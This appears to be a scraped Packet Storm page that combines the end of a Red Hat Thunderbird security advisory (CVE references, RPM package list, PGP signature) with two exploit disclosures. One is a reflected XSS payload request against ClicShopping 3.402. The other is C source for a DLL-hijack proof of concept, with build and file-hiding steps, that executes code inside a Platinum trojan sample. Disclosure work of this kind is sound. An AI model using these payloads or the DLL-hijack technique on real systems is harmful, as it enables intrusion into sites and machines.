2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
thunderbird-102.5.0-2.el8_7.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_7.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_7.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_7.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_7.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_7.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_7.ppc64le.rpm

s390x:  
thunderbird-102.5.0-2.el8_7.s390x.rpm  
thunderbird-debuginfo-102.5.0-2.el8_7.s390x.rpm  
thunderbird-debugsource-102.5.0-2.el8_7.s390x.rpm

x86_64:  
thunderbird-102.5.0-2.el8_7.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_7.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY3t1SNzjgjWX9erEAQjA+Q//Y4tGRasBEObl/Hl6RdMXxbr99NGTqv4P  
wjZyuwUzP94t0F6KqzjRAO1f58vi4fGgPvwmOnSmLAZLdqIhhMbnRHjKiCbEIqnV  
1PGUwg8fJTfx8LDqUMLtZNExEZgtc0m+iViq1sTZM/zZyodfAUrmJoLt56BqFvXe  
6onWhniuRDPnYtDY5F6jSL2g2FFm7ZQvEpVJQvouR0WTqEN2qeexaXvRpu7Iucgf  
8F9/mHB8wOfcIq7oB3jRX8jDDHG0fysHfxwAeQuo8KncWUDASYJDa4qSYxCNvUu5  
zxk0y4bl3u/rYCH/29+fyj/pRJHWmAxaBnEqS/9XdbVVPy3+9/DSi4c92/UUGGoY  
pdy9Fhjb2l9mnsL0zOZNJ90w8lhG9rbWmcE7bHunfQRxVQibFEniP5QJie0FWAjw  
d5AKDc9yUO1F14sZ9FRRTNzxfVxRAbKRSpQ/DVSs57NEyBxcMuzmd1epM+juZFLy  
+d0DDceyIyRI+AP53PHoYr3jNLDoSz3okE11ItDP3I5pRGtSaW2Vp8JeZNj7KNpk  
VZTC4xcAqsldxtT04pEf6SVsbcDTEj3y3zGaghedv7vSqfb3u50HPLCE9oNhfT7s  
NszHZ3dSAE1h7imHL4R3xYVaWI8+WUCDieZLHH7prIwZVzGSf3hcxPOjOpkpO4o/  
RU1ZppUKZUU=  
=HOAc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8547-01

ClicShopping version 3.402 suffers from a cross site scripting vulnerability.

    ## Title: ClicShopping_V3-Version3.402 XSS-Reflected## Author: nu11secur1ty## Date: 11.20.2022## Vendor: https://www.clicshopping.org/forum/## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The attacker can trick users to open a very dangerous link or he canget sensitive information, also he can destroy some components of yoursystem.## STATUS: HIGH Vulnerability[+] Payload:```jsGET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)## Proof and Exploit:[href](https://streamable.com/mgbftx)## Time spent`1:00`

ClicShopping 3.402 Cross Site Scripting

Trojan.Win32.Platinum.gen malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/71a76adeadc7b51218d265771fc2b0d1.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Trojan.Win32.Platinum.genVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vuln DLL execute our own code, control and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.Family: PlatinumGroupType: PE32MD5: 71a76adeadc7b51218d265771fc2b0d1Vuln ID: MVID-2022-0657Dropped files: Adobe_Update_Sync.exeDisclosure: 11/18/2022 Exploit/PoC:1) Compile the following C code as "WTSAPI32.dll"2) Place the DLL in same directory as the malware3) Optional - Hide it: attrib +s +h "WTSAPI32.dll"4) Run the malware#include "windows.h"//By malvuln - November 2022//Purpose: PWN Platinum Group malware strain MD5: 71a76adeadc7b51218d265771fc2b0d1//gcc -c WTSAPI32.c -m32//gcc -shared -o WTSAPI32.dll WTSAPI32.o -m32/** DISCLAIMER:Author is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**/BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){  switch (reason) {  case DLL_PROCESS_ATTACH:   MessageBox(NULL, "Platinum Group\nPWNED!!! by Malvuln", "Code Exec PoC", MB_OK);   TCHAR buf[MAX_PATH];   if(GetCurrentDirectory(MAX_PATH, buf))   if(strcmp("C:\\Windows\\System32", buf) != 0){      HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());     if (NULL != handle) {           TerminateProcess(handle, 0);       CloseHandle(handle);     }   }    break;  }  return TRUE;}Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source

Packet Storm